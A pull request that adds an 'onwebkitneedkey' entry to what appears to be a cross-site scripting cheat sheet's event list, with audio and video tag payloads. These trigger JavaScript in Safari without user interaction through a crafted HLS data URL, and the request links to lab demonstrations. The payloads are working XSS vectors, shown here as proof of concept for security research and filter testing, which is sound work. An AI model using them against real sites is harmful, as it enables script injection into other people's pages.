### PR TITLE
Add onwebkitneedkey event - no user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6507,5 +6507,22 @@
         "interaction": true
       }
     ]
+  },
+  "onwebkitneedkey": {
+    "description": "Fires when an HTML media element encounters encrypted content and needs a decryption key from the page",
+    "tags": [
+      {
+        "tag": "audio",
+        "code": "<audio src=data:,%23EXTM3U%0A%23EXT-X-TARGETDURATION:1%0A%23EXT-X-KEY:METHOD=AES-128,URI=%22skd:%22%0A%23EXTINF:1%0Ax onwebkitneedkey=alert(1)></audio>",
+        "browsers": ["safari"],
+        "interaction": false
+      },
+      {
+        "tag": "video",
+        "code": "<video src=data:,%23EXTM3U%0A%23EXT-X-TARGETDURATION:1%0A%23EXT-X-KEY:METHOD=AES-128,URI=%22skd:%22%0A%23EXTINF:1%0Ax onwebkitneedkey=alert(1)></video>",
+        "browsers": ["safari"],
+        "interaction": false
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, open either link in Safari:
- https://portswigger-labs.net/xss/xss.php?context=html&x=%3Cvideo%20src%3Ddata%3A%2C%2523EXTM3U%250A%2523EXT-X-TARGETDURATION%3A1%250A%2523EXT-X-KEY%3AMETHOD%3DAES-128%2CURI%3D%2522skd%3A%2522%250A%2523EXTINF%3A1%250Ax%20onwebkitneedkey%3Dalert%281%29%3E%3C%2Fvideo%3E
- https://portswigger-labs.net/xss/xss.php?context=html&x=%3Caudio%20src%3Ddata%3A%2C%2523EXTM3U%250A%2523EXT-X-TARGETDURATION%3A1%250A%2523EXT-X-KEY%3AMETHOD%3DAES-128%2CURI%3D%2522skd%3A%2522%250A%2523EXTINF%3A1%250Ax%20onwebkitneedkey%3Dalert%281%29%3E%3C%2Faudio%3E